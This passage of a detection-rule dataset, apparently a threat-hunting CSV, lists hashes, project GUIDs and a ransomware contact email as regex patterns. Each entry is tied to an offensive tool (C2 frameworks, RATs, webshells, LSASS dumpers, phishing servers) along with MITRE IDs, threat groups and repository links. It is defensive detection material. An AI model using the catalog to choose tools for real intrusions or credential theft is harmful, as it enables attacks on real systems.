- TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","30955" "*8F208DB9-7555-46D5-A5FE-2D7E85E05CAA*",".{0,1000}8F208DB9\-7555\-46D5\-A5FE\-2D7E85E05CAA.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30956" "*8f23f05d5f97707f4e3e4d90175a099fb924b07c9ed7b81e3a1b8d4bc1c471df*",".{0,1000}8f23f05d5f97707f4e3e4d90175a099fb924b07c9ed7b81e3a1b8d4bc1c471df.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30957" "*8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20*",".{0,1000}8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#filehash","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","30959" "*8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01*",".{0,1000}8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30960" "*8f32c6af660897e07089798972eaba79006a5aeeb7a96327a597d4e47eaa34d9*",".{0,1000}8f32c6af660897e07089798972eaba79006a5aeeb7a96327a597d4e47eaa34d9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30961" "*8f3975294d590878d7c5cfc015c2fa1a0ac7b4d316f5f2e62c42cc1473d1f1be*",".{0,1000}8f3975294d590878d7c5cfc015c2fa1a0ac7b4d316f5f2e62c42cc1473d1f1be.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30962" "*8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f*",".{0,1000}8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30963" "*8f42a2c94a2d7f651e114afca2b89ac93f0a8774f5d9dbb8d15b5a8300120273*",".{0,1000}8f42a2c94a2d7f651e114afca2b89ac93f0a8774f5d9dbb8d15b5a8300120273.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30964" "*8f45cb2ad194897123fc4cfac863bc1cb746a35e4f339261b88351d136289181*",".{0,1000}8f45cb2ad194897123fc4cfac863bc1cb746a35e4f339261b88351d136289181.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30965" "*8f48fc7f2b40dd92fea030c044e9d48035cf6a561b3a09d02c161bacab0f3c30*",".{0,1000}8f48fc7f2b40dd92fea030c044e9d48035cf6a561b3a09d02c161bacab0f3c30.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30967" "*8f4a61afd9794d6024f42008417a94865d1912b5def2cfe91ea10cb60340cf8e*",".{0,1000}8f4a61afd9794d6024f42008417a94865d1912b5def2cfe91ea10cb60340cf8e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30968" "*8f60eedf43f6559c83c5debc70d84fbf4f1cc87239acbf304d2f1ac78a09a1e5*",".{0,1000}8f60eedf43f6559c83c5debc70d84fbf4f1cc87239acbf304d2f1ac78a09a1e5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30969" "*8F6EB0768AB3620A60AC80E9A1E14F83BD7332E8AFC00092FD4768C8686DA87E*",".{0,1000}8F6EB0768AB3620A60AC80E9A1E14F83BD7332E8AFC00092FD4768C8686DA87E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30972" "*8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299*",".{0,1000}8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30973" "*8F71C671-F53C-4F4F-98B9-8B8D3263C0DB*",".{0,1000}8F71C671\-F53C\-4F4F\-98B9\-8B8D3263C0DB.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30974" "*8f71ce37ef8df7223f14a8c3021b94b2b7d3bcd23b813df32497826887e0b14a*",".{0,1000}8f71ce37ef8df7223f14a8c3021b94b2b7d3bcd23b813df32497826887e0b14a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","30975" "*8f78ba859a0d8f7a131310f48406af6faf0496871588ffb071bd186cdc8e8e65*",".{0,1000}8f78ba859a0d8f7a131310f48406af6faf0496871588ffb071bd186cdc8e8e65.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","30980" "*8f93c473d769f7d93c9293fefb6c6f4dcca66ecbf9fba6dc968fc2d061696d0b*",".{0,1000}8f93c473d769f7d93c9293fefb6c6f4dcca66ecbf9fba6dc968fc2d061696d0b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30984" 
"*8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de*",".{0,1000}8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30985" "*8f9c15a3849965a7739d98d4769d1a3c2a5943265f6a189ab74ea077620f9cbc*",".{0,1000}8f9c15a3849965a7739d98d4769d1a3c2a5943265f6a189ab74ea077620f9cbc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30986" "*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30987" "*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30988" "*8fa8dcae188d04bb3bb48782d5f97019c3a122816d9f48a6a8554ce211acb1f8*",".{0,1000}8fa8dcae188d04bb3bb48782d5f97019c3a122816d9f48a6a8554ce211acb1f8.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. 
Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","30989" "*8faee6fcefcca679fe3777b211a7a6ec5f9df13272dce5a138a2517937109295*",".{0,1000}8faee6fcefcca679fe3777b211a7a6ec5f9df13272dce5a138a2517937109295.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30991" "*8FC203AA-8A90-4A15-B823-E2C3BC4DF0D6*",".{0,1000}8FC203AA\-8A90\-4A15\-B823\-E2C3BC4DF0D6.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#GUIDProject","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","30993" "*8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace*",".{0,1000}8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. 
that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","30994" "*8fc2d1718acdfb83bf620dea1f87f053ad99f609b9881afe70913c6284543223*",".{0,1000}8fc2d1718acdfb83bf620dea1f87f053ad99f609b9881afe70913c6284543223.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30995" "*8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436*",".{0,1000}8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30996" "*8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436*",".{0,1000}8fc36834909b236d10cf316bb5c265745c022e94708b8d759c6d20ee25c3e436.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30997" "*8fc8b333eff4c9c189b5843e20e749cb0b67cba23f8ab993cc162d4c8865ae4c*",".{0,1000}8fc8b333eff4c9c189b5843e20e749cb0b67cba23f8ab993cc162d4c8865ae4c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30998" "*8fcb35dfb7c7decc047cc08442a59f92aad7eef538a1c46e7989240bdb17037a*",".{0,1000}8fcb35dfb7c7decc047cc08442a59f92aad7eef538a1c46e7989240bdb17037a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31000" "*8fdae5b4490183c9057a684f0ac2f82dd5c8911cb2f43a54ff47a9ad6e93952a*",".{0,1000}8fdae5b4490183c9057a684f0ac2f82dd5c8911cb2f43a54ff47a9ad6e93952a.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","31003" "*8ff9a955c42b825da52cbc493b836da8604b30abe8ee2fd81f2954066b16ad4f*",".{0,1000}8ff9a955c42b825da52cbc493b836da8604b30abe8ee2fd81f2954066b16ad4f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - 
EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31005" "*8fff8971be038906411561230e11adae6f576dca6761375cbcf61d3e7b2e4cd4*",".{0,1000}8fff8971be038906411561230e11adae6f576dca6761375cbcf61d3e7b2e4cd4.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#filehash","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","31006" "*8filesback@onionmail.org*",".{0,1000}8filesback\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","31007" "*90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566*",".{0,1000}90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31008" 
"*900b0066aed8e2c6c6c59122831b0e7ee4ea0328a5f8cd7a5bff739ef9cdb366*",".{0,1000}900b0066aed8e2c6c6c59122831b0e7ee4ea0328a5f8cd7a5bff739ef9cdb366.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31009" "*900d1ae66a883c047dbe402f9d11c14962173279c8e617ced5508da39037ffa5*",".{0,1000}900d1ae66a883c047dbe402f9d11c14962173279c8e617ced5508da39037ffa5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31010" "*901E099B-A01A-4F21-9A6F-8D3B60F04168*",".{0,1000}901E099B\-A01A\-4F21\-9A6F\-8D3B60F04168.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","31012" "*901e877ce39c5b9a7f35c58b30a6d1be15c94f44b0d1ae84007c59d7a11011a2*",".{0,1000}901e877ce39c5b9a7f35c58b30a6d1be15c94f44b0d1ae84007c59d7a11011a2.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31013" "*90229D7D-5CC2-4C1E-80D3-4B7C7289B480*",".{0,1000}90229D7D\-5CC2\-4C1E\-80D3\-4B7C7289B480.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#GUIDproject","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","31014" "*902337b62862f99bbf97131701eaab2be82fd5a84b7d379cec0acff56a2bf670*",".{0,1000}902337b62862f99bbf97131701eaab2be82fd5a84b7d379cec0acff56a2bf670.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","31015" 
"*9027a0ddabd5e6267e365572f404e2f0019a02d3f91f8434ca674765c46f4f22*",".{0,1000}9027a0ddabd5e6267e365572f404e2f0019a02d3f91f8434ca674765c46f4f22.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31016" "*90286bcf91af16552af2fb7aab0007d06a48493bdd2cb3b7367c7e540f70596b*",".{0,1000}90286bcf91af16552af2fb7aab0007d06a48493bdd2cb3b7367c7e540f70596b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31017" "*902b3361a8df50b70a7c9b88aa728fe9d5092f2dc3d8d6691da4a3bcd4a4d56e*",".{0,1000}902b3361a8df50b70a7c9b88aa728fe9d5092f2dc3d8d6691da4a3bcd4a4d56e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31018" "*902d0c9bf021c0320c144524268e05f889f733e07b76c24ebdda299e0508239a*",".{0,1000}902d0c9bf021c0320c144524268e05f889f733e07b76c24ebdda299e0508239a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - 
